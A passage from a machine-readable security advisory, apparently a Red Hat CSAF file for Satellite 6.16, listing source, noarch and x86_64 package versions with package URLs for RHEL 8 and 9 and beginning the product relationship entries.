"name": "foreman-installer-1:3.12.0.8-1.el8sat.src",
"product": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.src",
"product_id": "foreman-installer-1:3.12.0.8-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer@3.12.0.8-1.el8sat?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "openvox-server-0:8.14.1-1.el8sat.src",
"product": {
"name": "openvox-server-0:8.14.1-1.el8sat.src",
"product_id": "openvox-server-0:8.14.1-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-server@8.14.1-1.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "openvox-agent-0:8.24.1-3.el8sat.src",
"product": {
"name": "openvox-agent-0:8.24.1-3.el8sat.src",
"product_id": "openvox-agent-0:8.24.1-3.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-agent@8.24.1-3.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.src",
"product": {
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.src",
"product_id": "rubygem-katello-0:4.14.0.21-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-katello@4.14.0.21-1.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-faraday-0:1.10.6-1.el8sat.src",
"product": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.src",
"product_id": "rubygem-faraday-0:1.10.6-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-faraday@1.10.6-1.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pyjwt-0:2.13.0-1.el8pc.src",
"product": {
"name": "python-pyjwt-0:2.13.0-1.el8pc.src",
"product_id": "python-pyjwt-0:2.13.0-1.el8pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pyjwt@2.13.0-1.el8pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pillow-0:12.3.0-1.el8pc.src",
"product": {
"name": "python-pillow-0:12.3.0-1.el8pc.src",
"product_id": "python-pillow-0:12.3.0-1.el8pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow@12.3.0-1.el8pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"product": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"product_id": "rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri@1.15.7-3.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "satellite-0:6.16.12-1.el8sat.src",
"product": {
"name": "satellite-0:6.16.12-1.el8sat.src",
"product_id": "satellite-0:6.16.12-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite@6.16.12-1.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pulp-container-0:2.20.10-2.el8pc.src",
"product": {
"name": "python-pulp-container-0:2.20.10-2.el8pc.src",
"product_id": "python-pulp-container-0:2.20.10-2.el8pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pulp-container@2.20.10-2.el8pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pysequoia-0:0.1.33-1.el8pc.src",
"product": {
"name": "python-pysequoia-0:0.1.33-1.el8pc.src",
"product_id": "python-pysequoia-0:0.1.33-1.el8pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pysequoia@0.1.33-1.el8pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"product": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"product_id": "scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/scap-security-guide-satellite@1.0.6-1.el8sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "libsolv-1:0.7.20-7.el8sat.src",
"product": {
"name": "libsolv-1:0.7.20-7.el8sat.src",
"product_id": "libsolv-1:0.7.20-7.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv@0.7.20-7.el8sat?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"product": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"product_id": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-foreman_maintain@1.7.15-1.el9sat?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "foreman-installer-1:3.12.0.8-1.el9sat.src",
"product": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.src",
"product_id": "foreman-installer-1:3.12.0.8-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer@3.12.0.8-1.el9sat?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "openvox-server-0:8.14.1-1.el9sat.src",
"product": {
"name": "openvox-server-0:8.14.1-1.el9sat.src",
"product_id": "openvox-server-0:8.14.1-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-server@8.14.1-1.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "openvox-agent-0:8.24.1-3.el9sat.src",
"product": {
"name": "openvox-agent-0:8.24.1-3.el9sat.src",
"product_id": "openvox-agent-0:8.24.1-3.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-agent@8.24.1-3.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.src",
"product": {
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.src",
"product_id": "rubygem-katello-0:4.14.0.21-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-katello@4.14.0.21-1.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-faraday-0:1.10.6-1.el9sat.src",
"product": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.src",
"product_id": "rubygem-faraday-0:1.10.6-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-faraday@1.10.6-1.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pyjwt-0:2.13.0-1.el9pc.src",
"product": {
"name": "python-pyjwt-0:2.13.0-1.el9pc.src",
"product_id": "python-pyjwt-0:2.13.0-1.el9pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pyjwt@2.13.0-1.el9pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pillow-0:12.3.0-1.el9pc.src",
"product": {
"name": "python-pillow-0:12.3.0-1.el9pc.src",
"product_id": "python-pillow-0:12.3.0-1.el9pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow@12.3.0-1.el9pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"product": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"product_id": "rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri@1.15.7-3.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "satellite-0:6.16.12-1.el9sat.src",
"product": {
"name": "satellite-0:6.16.12-1.el9sat.src",
"product_id": "satellite-0:6.16.12-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite@6.16.12-1.el9sat?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pulp-container-0:2.20.10-2.el9pc.src",
"product": {
"name": "python-pulp-container-0:2.20.10-2.el9pc.src",
"product_id": "python-pulp-container-0:2.20.10-2.el9pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pulp-container@2.20.10-2.el9pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-pysequoia-0:0.1.33-1.el9pc.src",
"product": {
"name": "python-pysequoia-0:0.1.33-1.el9pc.src",
"product_id": "python-pysequoia-0:0.1.33-1.el9pc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pysequoia@0.1.33-1.el9pc?arch=src"
}
}
},
{
"category": "product_version",
"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.src",
"product": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.src",
"product_id": "scap-security-guide-satellite-0:1.0.6-1.el9sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/scap-security-guide-satellite@1.0.6-1.el9sat?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"product": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"product_id": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-foreman_maintain@1.7.15-1.el8sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"product": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"product_id": "foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer@3.12.0.8-1.el8sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"product": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"product_id": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer-katello@3.12.0.8-1.el8sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "openvox-server-0:8.14.1-1.el8sat.noarch",
"product": {
"name": "openvox-server-0:8.14.1-1.el8sat.noarch",
"product_id": "openvox-server-0:8.14.1-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-server@8.14.1-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"product": {
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"product_id": "rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-katello@4.14.0.21-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"product": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"product_id": "rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-faraday@1.10.6-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"product": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"product_id": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pyjwt%2Bcrypto@2.13.0-1.el8pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"product": {
"name": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"product_id": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pyjwt@2.13.0-1.el8pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-capsule-0:6.16.12-1.el8sat.noarch",
"product": {
"name": "satellite-capsule-0:6.16.12-1.el8sat.noarch",
"product_id": "satellite-capsule-0:6.16.12-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-capsule@6.16.12-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-common-0:6.16.12-1.el8sat.noarch",
"product": {
"name": "satellite-common-0:6.16.12-1.el8sat.noarch",
"product_id": "satellite-common-0:6.16.12-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-common@6.16.12-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-0:6.16.12-1.el8sat.noarch",
"product": {
"name": "satellite-0:6.16.12-1.el8sat.noarch",
"product_id": "satellite-0:6.16.12-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite@6.16.12-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-cli-0:6.16.12-1.el8sat.noarch",
"product": {
"name": "satellite-cli-0:6.16.12-1.el8sat.noarch",
"product_id": "satellite-cli-0:6.16.12-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-cli@6.16.12-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"product": {
"name": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"product_id": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pulp-container@2.20.10-2.el8pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"product": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"product_id": "scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/scap-security-guide-satellite@1.0.6-1.el8sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"product": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"product_id": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-foreman_maintain@1.7.15-1.el9sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"product": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"product_id": "foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer@3.12.0.8-1.el9sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"product": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"product_id": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/foreman-installer-katello@3.12.0.8-1.el9sat?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "openvox-server-0:8.14.1-1.el9sat.noarch",
"product": {
"name": "openvox-server-0:8.14.1-1.el9sat.noarch",
"product_id": "openvox-server-0:8.14.1-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-server@8.14.1-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"product": {
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"product_id": "rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-katello@4.14.0.21-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"product": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"product_id": "rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-faraday@1.10.6-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"product": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"product_id": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pyjwt%2Bcrypto@2.13.0-1.el9pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"product": {
"name": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"product_id": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pyjwt@2.13.0-1.el9pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-capsule-0:6.16.12-1.el9sat.noarch",
"product": {
"name": "satellite-capsule-0:6.16.12-1.el9sat.noarch",
"product_id": "satellite-capsule-0:6.16.12-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-capsule@6.16.12-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-common-0:6.16.12-1.el9sat.noarch",
"product": {
"name": "satellite-common-0:6.16.12-1.el9sat.noarch",
"product_id": "satellite-common-0:6.16.12-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-common@6.16.12-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-0:6.16.12-1.el9sat.noarch",
"product": {
"name": "satellite-0:6.16.12-1.el9sat.noarch",
"product_id": "satellite-0:6.16.12-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite@6.16.12-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "satellite-cli-0:6.16.12-1.el9sat.noarch",
"product": {
"name": "satellite-cli-0:6.16.12-1.el9sat.noarch",
"product_id": "satellite-cli-0:6.16.12-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/satellite-cli@6.16.12-1.el9sat?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"product": {
"name": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"product_id": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pulp-container@2.20.10-2.el9pc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"product": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"product_id": "scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/scap-security-guide-satellite@1.0.6-1.el9sat?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "openvox-agent-0:8.24.1-3.el8sat.x86_64",
"product": {
"name": "openvox-agent-0:8.24.1-3.el8sat.x86_64",
"product_id": "openvox-agent-0:8.24.1-3.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-agent@8.24.1-3.el8sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"product": {
"name": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"product_id": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pillow@12.3.0-1.el8pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"product": {
"name": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"product_id": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@12.3.0-1.el8pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"product": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"product_id": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pillow-debuginfo@12.3.0-1.el8pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"product": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"product_id": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri@1.15.7-3.el8sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"product": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"product_id": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri-debugsource@1.15.7-3.el8sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"product": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"product_id": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri-debuginfo@1.15.7-3.el8sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"product": {
"name": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"product_id": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pysequoia@0.1.33-1.el8pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libsolv-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "libsolv-1:0.7.20-7.el8sat.x86_64",
"product_id": "libsolv-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "python3-solv-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "python3-solv-1:0.7.20-7.el8sat.x86_64",
"product_id": "python3-solv-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-solv@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"product_id": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv-debugsource@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv-demo-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libsolv-tools-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perl-solv-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-solv-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product": {
"name": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_id": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-solv-debuginfo@0.7.20-7.el8sat?arch=x86_64\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "openvox-agent-0:8.24.1-3.el9sat.x86_64",
"product": {
"name": "openvox-agent-0:8.24.1-3.el9sat.x86_64",
"product_id": "openvox-agent-0:8.24.1-3.el9sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openvox-agent@8.24.1-3.el9sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"product": {
"name": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"product_id": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pillow@12.3.0-1.el9pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"product": {
"name": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"product_id": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@12.3.0-1.el9pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"product": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"product_id": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pillow-debuginfo@12.3.0-1.el9pc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"product": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"product_id": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri@1.15.7-3.el9sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"product": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"product_id": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri-debugsource@1.15.7-3.el9sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"product": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"product_id": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-nokogiri-debuginfo@1.15.7-3.el9sat?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"product": {
"name": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"product_id": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.11-pysequoia@0.1.33-1.el9pc?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
